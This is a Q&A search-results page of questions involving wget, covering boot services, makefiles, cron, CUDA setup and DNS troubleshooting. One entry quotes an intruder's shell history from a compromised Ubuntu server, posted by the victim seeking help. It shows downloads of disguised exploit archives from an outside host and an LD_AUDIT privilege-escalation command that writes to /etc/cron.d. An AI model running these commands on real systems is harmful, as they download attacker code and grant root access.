Search Results

Search found 593 results on 24 pages for 'wget'.

Page 7/24 | < Previous Page | 3 4 5 6 7 8 9 10 11 12 13 14  | Next Page >

  • Reset rc.d so software starts at boot again

    - by natli
    I ran the following two commands on my VPS box and now it boots without starting any software at all. According to rcconf it's still supposed to start my chosen software (ssh etc.), but it doesn't:

        update-rc.d vz defaults
        update-rc.d vzeventd defaults

    I already tried removing them again with

        update-rc.d -f vz remove
        update-rc.d -f vzeventd remove

    but that didn't change anything. /etc/rc.local also still correctly lists some scripts I want to run at start-up, but they don't seem to be called either. I expect the top two commands to be responsible, but here's everything I did:

        mkdir /var/openvz-dl
        cd /var/openvz-dl
        wget http://download.openvz.org/kernel/branches/rhel6-2.6.32/042stab062.2/vzkernel-2.6.32-042stab062.2.x86_64.rpm
        wget http://download.openvz.org/kernel/branches/rhel6-2.6.32/042stab062.2/vzkernel-devel-2.6.32-042stab062.2.x86_64.rpm
        wget http://download.openvz.org/utils/vzctl/4.0/vzctl-4.0-1.x86_64.rpm
        wget http://download.openvz.org/utils/vzctl/4.0/vzctl-core-4.0-1.x86_64.rpm
        wget http://download.openvz.org/utils/ploop/1.5/ploop-1.5-1.x86_64.rpm
        wget http://download.openvz.org/utils/ploop/1.5/ploop-lib-1.5-1.x86_64.rpm
        wget http://download.openvz.org/utils/vzquota/3.1/vzquota-3.1-1.x86_64.rpm
        apt-get install fakeroot alien
        fakeroot alien --to-deb --scripts --keep-version vz*.rpm ploop*.rpm
        dpkg -i vz*.deb ploop*.deb --force-overwrite
        update-rc.d vz defaults
        update-rc.d vzeventd defaults
        reboot

    A huge part of that failed because I was running it on an OpenVZ VPS, which has a shared kernel that can't be altered, so I also had to fix dpkg like so (it was complaining about wanting to install vzkernel, with a package not being found):

        rm /var/lib/dpkg/info/vzkernel*
        dpkg-reconfigure vzkernel --force
        dpkg --purge --force-all vzkernel

    But that didn't fix the boot issue either. How do I make my software start at boot again?
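
    A minimal diagnostic sketch, assuming a stock Debian/Ubuntu sysv-rc layout; "ssh" below stands in for whatever service rcconf lists:

        # Check whether the start links for the default runlevel survived
        ls -l /etc/rc2.d/ | grep -i ssh

        # Re-register a service whose links are missing
        update-rc.d ssh defaults

        # /etc/rc.local is only executed if it has the executable bit set
        ls -l /etc/rc.local
        chmod +x /etc/rc.local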

  • make include directive and dependency generation with -MM

    - by Robert S. Barnes
    I want a build rule to be triggered by an include directive if the target of the include is out of date or doesn't exist. Currently the makefile looks like this:

        program_NAME := wget++
        program_H_SRCS := $(wildcard *.h)
        program_CXX_SRCS := $(wildcard *.cpp)
        program_CXX_OBJS := ${program_CXX_SRCS:.cpp=.o}
        program_OBJS := $(program_CXX_OBJS)
        DEPS = make.deps

        .PHONY: all clean distclean

        all: $(program_NAME) $(DEPS)

        $(program_NAME): $(program_OBJS)
        	$(LINK.cc) $(program_OBJS) -o $(program_NAME)

        clean:
        	@- $(RM) $(program_NAME)
        	@- $(RM) $(program_OBJS)
        	@- $(RM) make.deps

        distclean: clean

        make.deps: $(program_CXX_SRCS) $(program_H_SRCS)
        	$(CXX) $(CPPFLAGS) -MM $(program_CXX_SRCS) > make.deps

        include $(DEPS)

    The problem is that the include directive seems to execute before the rule that builds make.deps, which effectively means make either gets no dependency list at all (if make.deps doesn't exist) or always gets the make.deps from the previous build rather than the current one. For example:

        $ make clean
        $ make
        makefile:32: make.deps: No such file or directory
        g++ -MM addrCache.cpp connCache.cpp httpClient.cpp wget++.cpp > make.deps
        g++ -c -o addrCache.o addrCache.cpp
        g++ -c -o connCache.o connCache.cpp
        g++ -c -o httpClient.o httpClient.cpp
        g++ -c -o wget++.o wget++.cpp
        g++ addrCache.o connCache.o httpClient.o wget++.o -o wget++
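
    A common alternative (a sketch, not necessarily the asker's final fix) is to generate one dependency fragment per object with -MMD at compile time and pull the fragments in with -include, which, unlike include, does not abort when they don't exist yet (recipe lines must start with a tab):

        program_DEPS := $(program_CXX_OBJS:.o=.d)

        %.o: %.cpp
        	$(CXX) $(CPPFLAGS) $(CXXFLAGS) -MMD -MP -c $< -o $@

        -include $(program_DEPS)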

  • How can I force WiFi connection to only use ipv4?

    - by krasilich
    I have a Broadcom BCM43224 Wi-Fi card with the proprietary Broadcom STA driver. At home the Wi-Fi connection works well, but in the office, when I ping some resource, there is a lot of packet loss and I can't browse websites. I tried another way to check the Internet connection: downloading a file with wget.

        wget google.com       # very slow speed
        wget -4 google.com    # normal speed

    So it seems the problem is with the IPv6 configuration at the office. Can I force my Wi-Fi connection to use only IPv4 and completely ignore IPv6?
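
    A sketch of forcing the system off IPv6 entirely, using the stock kernel sysctls (nothing driver-specific is assumed here):

        # Until the next reboot
        sudo sysctl -w net.ipv6.conf.all.disable_ipv6=1
        sudo sysctl -w net.ipv6.conf.default.disable_ipv6=1

        # Persistently
        echo 'net.ipv6.conf.all.disable_ipv6 = 1' | sudo tee -a /etc/sysctl.conf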

  • Ubuntu Server hack [closed]

    - by haxpanel
    Hi! I looked at netstat and noticed that someone besides me is connected to the server by SSH. I looked into this because my user is supposed to be the only one with SSH access. I found this in an FTP user's .bash_history file:

        w
        uname -a
        ls -a
        sudo su
        wget qiss.ucoz.de/2010/.jpg
        wget qiss.ucoz.de/2010.jpg
        tar xzvf 2010.jpg
        rm -rf 2010.jpg
        cd 2010/
        ls -a
        ./2010
        ./2010x64
        ./2.6.31
        uname -a
        ls -a
        ./2.6.37-rc2
        python rh2010.py
        cd ..
        ls -a
        rm -rf 2010/
        ls -a
        wget qiss.ucoz.de/ubuntu2010_2.jpg
        tar xzvf ubuntu2010_2.jpg
        rm -rf ubuntu2010_2.jpg
        ./ubuntu2010-2
        ./ubuntu2010-2
        ./ubuntu2010-2
        cat /etc/issue
        umask 0
        dpkg -S /lib/libpcprofile.so
        ls -l /lib/libpcprofile.so
        LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
        ping
        gcc
        touch a.sh
        nano a.sh
        vi a.sh
        vim
        wget qiss.ucoz.de/ubuntu10.sh
        sh ubuntu10.sh
        nano ubuntu10.sh
        ls -a
        rm -rf ubuntu10.sh
        . .. a.sh .cache ubuntu10.sh ubuntu2010-2
        ls -a
        wget qiss.ucoz.de/ubuntu10.sh
        sh ubuntu10.sh
        ls -a
        rm -rf ubuntu10.sh
        wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
        rm -rf W2Ksp3.exe
        passwd

    The system is in a jail. Does that matter in the current case? What should I do? Thanks, everyone! I have already done the following: banned the connected SSH host with iptables, stopped the sshd in the jail, and saved bash_history, syslog, dmesg, and the files fetched by the wget lines in the history.

  • PHP set timeout for script with system call, set_time_limit not working

    - by tehalive
    I have a command-line PHP script that runs a wget request for each member of an array with foreach. The wget request can sometimes take a long time, so I want to be able to kill the script if it runs past 15 seconds, for example. I have PHP safe mode disabled and tried set_time_limit(15) early in the script; however, the script continues indefinitely.

    Update: Thanks to Dor for pointing out that this is because set_time_limit() does not count time spent in system() calls. So I am trying to find other ways to kill the script after 15 seconds of execution. However, I'm not sure whether it's possible to check how long the script has been running while it's in the middle of a wget request (a do-while loop did not work). Maybe fork a process with a timer and have it kill the parent after a set amount of time? Thanks for any tips!

    Update: Below is my relevant code. $url is passed from the command line and is an array of multiple URLs (sorry for not posting this initially):

        foreach ($url as $key => $value) {
            $wget = "wget -r -H -nd -l 999 $value";
            system($wget);
        }
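
    One low-effort approach (a sketch, assuming GNU coreutils' timeout is installed on the box) is to let the shell enforce the limit instead of PHP, since set_time_limit() doesn't count time spent inside system():

        <?php
        // Hypothetical rewrite of the loop above: timeout(1) kills wget
        // after 15 seconds; GNU timeout exits with status 124 in that case.
        foreach ($url as $value) {
            $cmd = "timeout 15 wget -r -H -nd -l 999 " . escapeshellarg($value);
            system($cmd, $status);
        }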

  • Unable to run `make` in Terminal on Mac OS X 10.7

    - by AlanTuring
    Hi, so I am trying to install the commands wget and with-readline for use with Mac OS X's Terminal. The configuration seems to work fine for both, even though for the first one I am required to specify host=i686-apple. When I get to the make part of the installation, the output is as follows (Pastie links, one for wget and one for with-readline):

        wget:          http://pastie.org/4925079
        with-readline: http://pastie.org/4925083

    So does anyone have any idea what's going on? Thanks in advance.

  • Choose IP address for a process to use on launch [duplicate]

    - by user1436026
    This question already has an answer here: How to set which IP to use for a HTTP request? (2 answers)

    Say my server has the following IP addresses:

        123.456.78.0
        123.467.79.1
        123.456.77.1
        123.456.68.0
        etc...

    Say I want to launch a process, say wget, from the command line. Normally, I would do something like this:

        wget http://www.google.com/

    except that I would like to choose which of my IP addresses the server uses to make this request. Is there a way to use wget, or to launch another command, with a choice of one of my own IP addresses, like the following pseudo-command?

        with-ip 123.456.68.0 wget http://www.google.com/
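
    For wget specifically there is a built-in flag for this; a short sketch reusing the question's placeholder addresses:

        # Bind the outgoing connection to one local address
        wget --bind-address=123.456.68.0 http://www.google.com/

        # curl's equivalent
        curl --interface 123.456.68.0 http://www.google.com/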

  • Can't run utilities/.exe's that use the network from a [DFS] Windows share on Windows 2008 servers. Can this be overcome?

    - by Jim Lawhon
    Under Windows Server 2008 I'm unable to run many utilities that use network resources; this works just fine under Windows Server 2003. For example:

        \\domain\dfs\tools$\bin\sendmail.exe ...
        \\domain\dfs\tools$\bin\psexec.exe ...
        echo %_metric% %_value% %_unixtime% | \\domain\dfs\bin\foo$\nc graphite.domain 2003 -w1

    Reproducing and maintaining this folder on a large number of servers/VMs is not desirable. Is there a way to allow Windows Server 2008 to run these tools? If so, can it be enabled via GPO or in a fashion that can be scripted during automated builds?

    Edit: The commands/tools work just fine when run from local drives.

    Edit 2: wget example:

        d:\scripts\helpers>z:\bin\wget http://www.google.com
        SYSTEM_WGETRC = c:/progra~1/wget/etc/wgetrc
        syswgetrc = z:/etc/wgetrc
        --2011-04-11 00:32:15--  http://www.google.com/
        Resolving www.google.com... failed: Host not found.
        z:\bin\wget: unable to resolve host address `www.google.com'

    wget can neither use DNS to resolve the IP nor use HTTP if provided an IP directly.

    Edit 3: The problem seems to be tied to DFS/DFS shares. Tools run correctly from other normal Windows Server file shares. They also run correctly when run directly from the file servers behind the DFS. They only fail when we attempt to run them from the DFS UNC path or mapped drives.

  • What's the extra FTP port here?

    - by warl0ck
    While downloading a tarball from the GNU FTP server, I noticed that besides the standard TCP port 21 connection, there is an extra connection:

        tcp  0  0  192.168.1.109:45056  208.118.235.20:21     ESTABLISHED  10956/wget
        tcp  0  0  192.168.1.109:56724  208.118.235.20:22259  ESTABLISHED  10956/wget

    What is that port used for? I checked /etc/services; only 20 and 21 should be in use. Am I wrong? The command in use was:

        wget 'ftp://ftp.gnu.org/gnu/tar/tar-1.26.tar.xz'
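
    For context, wget defaults to passive-mode FTP, in which the server picks a high port for the data transfer; that is the second connection shown above. A sketch comparing the two modes:

        # Passive (default): client connects out to a server-chosen high port
        wget 'ftp://ftp.gnu.org/gnu/tar/tar-1.26.tar.xz'

        # Active: the data connection comes back from the server's port 20
        wget --no-passive-ftp 'ftp://ftp.gnu.org/gnu/tar/tar-1.26.tar.xz'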

  • Running a cron entry over SSH: error message

    - by user1790649
    How do I run the script below?

        * * * * * /usr/bin/wget -O - -q "http://example.com/scheduler/cron"

    When I run it at the prompt, the error message shows up as below:

        $ * * * * * /usr/bin/wget -O - -q "http://website.com/?q=admin/settings/scheduler/cron"
        -sh: CHANGELOG.txt: not found
        $ 30 15 * * * /usr/bin/wget -O - -q "http://website.com/?q=admin/settings/scheduler/cron"
        -sh: 30: not found

    Can the script above be run over SSH (using the PuTTY software)?
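
    Crontab lines are schedule entries, not shell commands, so they have to be installed into a crontab rather than typed at the prompt. A sketch of doing that in the same SSH session (URL as in the question):

        # Interactive: open the crontab editor and paste the line
        crontab -e

        # Non-interactive: append to the existing crontab
        (crontab -l 2>/dev/null; echo '* * * * * /usr/bin/wget -O - -q "http://example.com/scheduler/cron"') | crontab -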

  • Cron job fails for any time other than default * * * * *

    - by Raghu
    On Ubuntu 11.10 (Oneiric Ocelot), my cron job runs fine if I use the default * * * * *, but if I want it to run at 17:00 or any other time, it never runs. My settings are:

        00 17 * * * wget http://www.abc.com/a.php

    I also tried:

        00 17 * * * root wget http://www.abc.com/a.php

    I also tried specifying the path. There is a carriage return at the end, and I'm logged in as root. Here is my complete crontab:

        TZ=Australia/Sydney
        22 7 * * * /usr/bin/wget http://www.abc.com/a.php
        22 7 * * * /bin/date >> /tmp/date.txt

    The output is as follows:

        root@Scrunch:~# sudo crontab -l -u root
        55 12 * * * date >>/tmp/crontest.txt
        root@Scrunch:~#

    Why does the terminal display so many blank lines after outputting the crontab entries? Do you suspect stray carriage returns? And I have not put entries in any other cron locations such as /etc/cron.d or /etc/cron.daily.
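
    A debugging sketch: capture the job's own output so environment problems become visible, and check cron's log to see whether the entry fired at all (standard Ubuntu paths assumed):

        00 17 * * * /usr/bin/wget -O /dev/null "http://www.abc.com/a.php" >> /tmp/cron-wget.log 2>&1

        # Did cron even try to run it?
        grep CRON /var/log/syslog | tail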

  • Remove Kernel 3.1

    - by chazdg
    Is there a way to remove kernel 3.1 from Oneiric? I downloaded and upgraded to 3.1 with these instructions. Open the terminal and run these two commands for both 32-bit and 64-bit versions of Ubuntu 11.10/11.04:

        wget http://kernel.ubuntu.com/~kernel-ppa...241006_all.deb
        sudo dpkg -i linux-headers-3.1.0-030100_3.1.0-030100.201110241006_all.deb

    For Ubuntu 11.10/11.04 (64-bit), issue these commands:

        wget http://kernel.ubuntu.com/~kernel-ppa...1006_amd64.deb
        sudo dpkg -i linux-headers-3.1.0-030100-generic_3.1.0-030100.201110241006_amd64.deb
        wget http://kernel.ubuntu.com/~kernel-ppa...1006_amd64.deb
        sudo dpkg -i linux-image-3.1.0-030100-generic_3.1.0-030100.201110241006_amd64.deb

    Everything went well and I was able to reboot quickly, but Firefox and Chrome constantly crash with kernel 3.1. I am using GNOME 3.2 and saw an improvement with the 3.0.0.13 kernel provided by the PPA. Any help with 3.1, or with just removing it, would be appreciated. Thanks to all who reply.
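
    A removal sketch built from the package names in the dpkg lines above (boot into the older kernel first; dpkg -l 'linux-*3.1*' will confirm the exact installed names):

        sudo dpkg --purge linux-image-3.1.0-030100-generic \
                          linux-headers-3.1.0-030100-generic \
                          linux-headers-3.1.0-030100
        sudo update-grub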

  • Cannot enter password for sudo [duplicate]

    - by Michael
    This question already has an answer here: add repository to ubuntu from terminal with pgp key (3 answers)

    I have used Ubuntu for several years, and now I cannot enter my password for sudo. This happens when I want to add a key to public.gpg for itunes10. The password normally works with sudo, but not when I enter this in the terminal:

        sudo wget -q "http://deb.playonlinux.com/public.gpg" -o- | sudo apt-get add -

    It just says 'Sorry, try again'. I had just installed itunes10 and have to add a key with wget to public.gpg. I tried entering

        sudo apt-get update

    in the terminal and the password works fine there, but not with sudo wget. Can someone please help?
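
    For reference, the conventional form of that pipeline is the following sketch; note the capital -O- (write the file to stdout) and apt-key rather than apt-get on the receiving end, and that the wget side doesn't need sudo at all:

        wget -q "http://deb.playonlinux.com/public.gpg" -O- | sudo apt-key add -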

  • Execute the Linux at command via PHP

    - by ahmad Rabie
    When I run this code via SSH

        echo wget http://domain.com/send_me_email.php | at 12:54

    it runs correctly and sends me an email at that time. But if I run PHP like this:

        exec("echo wget http://domain.com/send_me_email.php | at 12:54");
        exec("atq", $arr);
        print_r($arr);

    the result of that code is something like this:

        job 63 at 2011-11-27 12:54

    As you can see, the job is created successfully, but I don't receive any email at that time! I tested this line in PHP:

        exec("wget http://domain.com/send_me_email.php");

    and it sends me an email, which means I have permission to run exec and wget via PHP. But what is the problem? I can't understand it. Please help me. Thanks.
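
    A diagnostic sketch: at(1) normally mails the job's output to the job's owner, so redirecting wget's output to a log file (the path below is an arbitrary choice) shows what happened when the job ran under the web server's user:

        <?php
        // Queue the job with its output captured in /tmp/at-wget.log,
        // then print whatever at itself said while queuing.
        exec("echo 'wget -O /dev/null http://domain.com/send_me_email.php >> /tmp/at-wget.log 2>&1' | at 12:54 2>&1", $out);
        print_r($out);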

  • gitk without X11 [closed]

    - by svnpenn
    It has been noted here that Tcl/Tk, and in turn gitk, now require X11 under Cygwin. Having run it before and after this change, it seems like extreme overkill. I use gitk very lightly, mostly sticking to plain command-line git. How could I go about using gitk without X11, perhaps by manually installing an old version of Tcl/Tk? After some tinkering, I came up with this script that allows gitk without X11:

        #!/bin/sh
        # Requires Cygwin packages: git, make, mingw64-i686-gcc-core, wget

        # Install Tcl
        wget prdownloads.sf.net/tcl/tcl8.5.12-src.tar.gz
        tar xf tcl8.5.12-src.tar.gz
        cd tcl8.5.12/win
        ./configure --host i686-w64-mingw32
        make install
        cd -

        # Install Tk
        wget prdownloads.sf.net/tcl/tk8.5.12-src.tar.gz
        tar xf tk8.5.12-src.tar.gz
        cd tk8.5.12/win
        ./configure --host i686-w64-mingw32
        make install
        cd -

        # Install gitk
        cd /usr/local/bin
        wget raw.github.com/git/git/master/gitk-git/gitk
        chmod 700 gitk
        echo 'cygpath -m "$1" | xargs -I% wish85 % -- ${@:3}' > wish
        cd -

  • Ubuntu server 12.04 E: Unable to locate package noip2

    - by cesar
    I just installed Ubuntu Server 12.04 and I want to install No-IP. I ran as root:

        sudo apt-get install noip2

    and I got this:

        root@topcat:/var# sudo apt-get install noip2
        Reading package lists... Done
        Building dependency tree
        Reading state information... Done
        E: Unable to locate package noip2

    I also tried

        wget http://www.no-ip.com/client/linux/noip-duc-linux.tar.gz

    but I got:

        wget: unable to resolve host address `www.no-ip.com'

    Can somebody help me? I am new to Ubuntu.
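
    Since noip2 isn't in the Ubuntu archive, the usual route is building the client from the tarball named in the question; a sketch (the resolver error has to be fixed first, so name resolution is checked up front):

        # Name resolution must work before wget can fetch anything
        cat /etc/resolv.conf

        wget http://www.no-ip.com/client/linux/noip-duc-linux.tar.gz
        tar xzf noip-duc-linux.tar.gz
        cd noip-*/        # extracted directory name varies by client version
        make
        sudo make install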

  • How to download Vim script on the command-line?

    - by HaiYuan Zhang
    Whenever I want to install a new Vim script on the Linux server I'm working on, my typical workflow is the following:

        1. Surf the plugin's homepage on Vim online using FireXXXX.
        2. Download the right version of the plugin to my laptop by clicking some highlighted link.
        3. Upload the downloaded plugin from my laptop to the Linux server using WinSCP.

    which is really inconvenient. I don't know what the magic behind this is: I mean, for the same hyperlink, clicking it in a web browser downloads the file, but feeding that hyperlink to Wget on the Linux command line ends with nothing but an error. Alternatively, I can get the link in the web browser and then use Wget or some similar tool to actually do the downloading. I try new cool Vim scripts quite often, so you can imagine my dismay at having to repeat this tedious procedure all the time. What are some tips that would let me download Vim scripts in a more "professional" way?

    Post edit: My problem is not finding a tool like Wget or cURL. The problem I met is quite specific: using these tools to download a Vim script. Let's take http://www.vim.org/scripts/script.php?script_id=30 as an example. It's the normal place where one can get the script, at least for me. But I can't find a working URL on this page that I can feed to Wget.
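
    On vim.org the script page itself isn't the file; the entries in the page's download table point at download_script.php with a src_id per release. A sketch (the src_id below is a placeholder, to be read off the page's download table):

        wget -O plugin.zip 'http://www.vim.org/scripts/download_script.php?src_id=NNN'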

  • How to solve a CUDA crash when running the CUDA example fluidsGL?

    - by sam
    I use Ubuntu 12.04 64-bit with a GTX 560 Ti. I installed CUDA by following these instructions:

        wget http://developer.download.nvidia.com/compute/cuda/4_2/rel/toolkit/cudatoolkit_4.2.9_linux_64_ubuntu11.04.run
        wget http://developer.download.nvidia.com/compute/cuda/4_2/rel/drivers/devdriver_4.2_linux_64_295.41.run
        wget http://developer.download.nvidia.com/compute/cuda/4_2/rel/sdk/gpucomputingsdk_4.2.9_linux.run
        chmod +x cudatoolkit_4.2.9_linux_64_ubuntu11.04.run
        sudo ./cudatoolkit_4.2.9_linux_64_ubuntu11.04.run
        echo "/usr/local/cuda/lib64" > ~/cuda.conf
        echo "/usr/local/cuda/lib" >> ~/cuda.conf
        sudo mv ~/cuda.conf /etc/ld.so.conf.d/cuda.conf
        sudo ldconfig
        echo 'export PATH=$PATH:/usr/local/cuda/bin' >> ~/.bashrc
        chmod +x gpucomputingsdk_4.2.9_linux.run
        ./gpucomputingsdk_4.2.9_linux.run
        sudo apt-get install build-essential libx11-dev libglu1-mesa-dev freeglut3-dev libxi-dev libxmu-dev gcc-4.4 g++-4.4
        sed 's/g++ -fPIC/g++-4.4 -fPIC/g' ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk > ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk.bak; mv ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk.bak ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk
        sed 's/gcc -fPIC/gcc-4.4 -fPIC/g' ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk > ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk.bak; mv ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk.bak ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk
        sed 's/-L$(SHAREDDIR)\/lib/-L$(SHAREDDIR)\/lib -L\/usr\/lib\/nvidia-current/g' ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk > ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk.bak; mv ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk.bak ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk
        sed 's/-L$(SHAREDDIR)\/lib -L\/usr\/lib\/nvidia-current $(NVCUVIDLIB)/-L$(SHAREDDIR)\/lib $(NVCUVIDLIB)/g' ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk > ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk.bak; mv ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk.bak ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk

    After that, when I run

        ~/NVIDIA_GPU_Computing_SDK/C/bin/linux/release/./fluidsGL

    it gets stuck; even the mouse and keyboard stop responding. How can I solve this? Thank you~

  • How can I check Internet connectivity in a console?

    - by Ashfame
    Is there an easy way to check Internet connectivity from the console? I am trying to play around in a shell script. One idea is to wget --spider http://www.google.co.in/ and check the HTTP response code to see whether the Internet connection is working. But I think there must be an easier way that doesn't need to check against a site that never crashes ;)

    Edit: It seems there can be a lot of factors which can be individually examined, which is good. My intention at the moment is to check whether my blog is down. I have set up cron to check it every minute. For this, I check the HTTP response code of wget --spider against my blog. If it's not 200, it notifies me (I believe this is better than just pinging it, as the site may be under heavy load and might time out or respond very late). Now yesterday there was some problem with my Internet connection. The LAN was connected fine, but I just couldn't access any site. So I kept getting notifications, since the script couldn't find a 200 in the wget response. Now I want to make sure it notifies me only when I do have Internet connectivity. Checking DNS and LAN connectivity separately is a bit overkill for me, since I don't specifically need to figure out which problem it is. So what do you suggest I do?
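
    A sketch of a guard along those lines (hedged: it treats "a well-known host answers" as "the Internet is up", which is exactly the assumption the question is wary of; the blog URL is a placeholder):

        #!/bin/sh
        # Quick reachability probe before deciding the blog itself is down
        if wget -q --spider --timeout=5 --tries=1 http://www.google.com/; then
            # The Internet looks up, so a failed blog check is meaningful
            wget -q --spider "http://myblog.example/" || echo "blog down"
        fi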

  • Download acceleration with jigdo?

    - by james
    I'm using jigdo-lite to download a Debian DVD ISO. I already have the CD version of the image, so I added the CD files to the task. Now I need to download many (though not all) of the files in the DVD ISO. By default jigdo-lite uses wget to download files, and it seems jigdo (wget) downloads only one file at a time over a single connection, so I'm getting a low download speed. How can I accelerate the download speed with jigdo? Possible solutions:

        1. Using a different download manager with jigdo. Is it possible? If yes, how?
        2. Using jigdo (wget) to download multiple files at once. How?
        3. Getting the download links of the remaining files, so that they can be downloaded with a download manager and later added to the jigdo ISO. How?
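
    One knob worth knowing about (a sketch, assuming a stock jigdo-lite script, which keeps its settings in ~/.jigdo-lite): the wgetOpts variable there is passed straight through to wget, so per-download behaviour can be tuned, though files are still fetched one at a time:

        # Excerpt from ~/.jigdo-lite (values here are illustrative)
        wgetOpts='--passive-ftp --dot-style=mega --continue --timeout=30 --tries=3'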

  • DNS problems on CentOS fresh install

    - by Rick Koshi
    I'm having some DNS issues on a new box I'm installing with CentOS 6.2. I am able to look up names using nslookup, dig, or host, and I am able to ping machines by name or by IP address. However, when I try other tools, such as ssh, wget, or yum, they are unable to resolve names. For example:

        # wget http://www.google.com
        --2012-03-08 14:48:06--  http://www.google.com/
        Resolving www.google.com... failed: Name or service not known.
        wget: unable to resolve host address `www.google.com'

        # ssh www.google.com
        ssh: Could not resolve hostname www.google.com: Name or service not known

        # ping -c 1 www.google.com
        PING www.l.google.com (74.125.113.106) 56(84) bytes of data.
        64 bytes from vw-in-f106.1e100.net (74.125.113.106): icmp_seq=1 ttl=46 time=43.6 ms
        --- www.l.google.com ping statistics ---
        1 packets transmitted, 1 received, 0% packet loss, time 59ms
        rtt min/avg/max/mdev = 43.665/43.665/43.665/0.000 ms

        # host www.google.com
        www.google.com is an alias for www.l.google.com.
        www.l.google.com has address 74.125.113.99
        www.l.google.com has address 74.125.113.103
        www.l.google.com has address 74.125.113.104
        www.l.google.com has address 74.125.113.105
        www.l.google.com has address 74.125.113.106
        www.l.google.com has address 74.125.113.147

    My /etc/nsswitch.conf file is the default, including this (standard) line:

        hosts: files dns

    /etc/resolv.conf is as set up by DHCP:

        ; generated by /sbin/dhclient-script
        nameserver 192.168.1.254

    192.168.1.254 is a working DNS server (my DSL modem, which has worked for years with other machines). Anyone know why ping would work but ssh/wget would fail?

    Per NcA's suggestion, I tried changing /etc/resolv.conf to point to 8.8.8.8. Oddly enough, this does make it work. Obviously, my DSL modem is responding to DNS requests in some way that some parts of Linux's resolution system don't like. Looking at the tcpdump, I am unable to see what the difference is; certainly, both servers are sending the same addresses. Here's the output from tcpdump -nn -X with the server set to the DNS server on the DSL modem. It's clearly replying with the correct addresses, but ssh/wget don't seem happy with it for some reason:

        15:53:52.133580 IP 192.168.1.254.53 > 192.168.1.2.54836: 33157 7/0/0 CNAME www.l.google.com., A 74.125.115.105, A 74.125.115.106, A 74.125.115.147, A 74.125.115.99, A 74.125.115.103, A 74.125.115.104 (148)
        0x0000:  4500 00b0 e33a 0000 ff11 53b1 c0a8 01fe  E....:....S.....
        0x0010:  c0a8 0102 0035 d634 009c 7528 8185 8180  .....5.4..u(....
        0x0020:  0001 0007 0000 0000 0377 7777 0667 6f6f  .........www.goo
        0x0030:  676c 6503 636f 6d00 0001 0001 c00c 0005  gle.com.........
        0x0040:  0001 0007 acd0 0008 0377 7777 016c c010  .........www.l..
        0x0050:  c02c 0001 0001 0000 0001 0004 4a7d 7369  .,..........J}si
        0x0060:  c02c 0001 0001 0000 0001 0004 4a7d 736a  .,..........J}sj
        0x0070:  c02c 0001 0001 0000 0001 0004 4a7d 7393  .,..........J}s.
        0x0080:  c02c 0001 0001 0000 0001 0004 4a7d 7363  .,..........J}sc
        0x0090:  c02c 0001 0001 0000 0001 0004 4a7d 7367  .,..........J}sg
        0x00a0:  c02c 0001 0001 0000 0001 0004 4a7d 7368  .,..........J}sh

        15:53:52.135669 IP 192.168.1.254.53 > 192.168.1.2.54836: 65062- 0/0/0 (32)
        0x0000:  4500 003c e33b 0000 ff11 5424 c0a8 01fe  E..<.;....T$....
        0x0010:  c0a8 0102 0035 d634 0028 98f9 fe26 8000  .....5.4.(...&..
        0x0020:  0001 0000 0000 0000 0377 7777 0667 6f6f  .........www.goo
        0x0030:  676c 6503 636f 6d00 001c 0001            gle.com.....

    I'm not enough of an expert to know whether this is malformed in some way, but ping seems to do the right thing with it. For comparison, here's the same thing when querying 8.8.8.8:

        15:57:27.990270 IP 8.8.8.8.53 > 192.168.1.2.49028: 59114 7/0/0 CNAME www.l.google.com., A 74.125.113.105, A 74.125.113.103, A 74.125.113.106, A 74.125.113.147, A 74.125.113.104, A 74.125.113.99 (148)
        0x0000:  4500 00b0 5530 0000 2f11 6453 0808 0808  E...U0../.dS....
        0x0010:  c0a8 0102 0035 bf84 009c 39f8 e6ea 8180  .....5....9.....
        0x0020:  0001 0007 0000 0000 0377 7777 0667 6f6f  .........www.goo
        0x0030:  676c 6503 636f 6d00 0001 0001 c00c 0005  gle.com.........
        0x0040:  0001 0001 516a 0008 0377 7777 016c c010  ....Qj...www.l..
        0x0050:  c02c 0001 0001 0000 0116 0004 4a7d 7169  .,..........J}qi
        0x0060:  c02c 0001 0001 0000 0116 0004 4a7d 7167  .,..........J}qg
        0x0070:  c02c 0001 0001 0000 0116 0004 4a7d 716a  .,..........J}qj
        0x0080:  c02c 0001 0001 0000 0116 0004 4a7d 7193  .,..........J}q.
        0x0090:  c02c 0001 0001 0000 0116 0004 4a7d 7168  .,..........J}qh
        0x00a0:  c02c 0001 0001 0000 0116 0004 4a7d 7163  .,..........J}qc

        15:57:28.018909 IP 8.8.8.8.53 > 192.168.1.2.49028: 31984 1/1/0 CNAME www.l.google.com. (102)
        0x0000:  4500 0082 7b1b 0000 2f11 3e96 0808 0808  E...{.../.>.....
        0x0010:  c0a8 0102 0035 bf84 006e c67e 7cf0 8180  .....5...n.~|...
        0x0020:  0001 0001 0001 0000 0377 7777 0667 6f6f  .........www.goo
        0x0030:  676c 6503 636f 6d00 001c 0001 c00c 0005  gle.com.........
        0x0040:  0001 0001 517f 0008 0377 7777 016c c010  ....Q....www.l..
        0x0050:  c030 0006 0001 0000 0258 0026 036e 7334  .0.......X.&.ns4
        0x0060:  c010 0964 6e73 2d61 646d 696e c010 0016  ...dns-admin....
        0x0070:  91f3 0000 0384 0000 0384 0000 0708 0000  ................
        0x0080:  003c                                     .<

    I still don't know why the server's reply is adequate for ping but not for ssh/wget. If anyone has ideas, I'd be happy to hear them. For now, though, I can either point at an outside DNS server or set up my own server on the new box. It's a workaround that seems like it should be unnecessary, but it will allow me to proceed.
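
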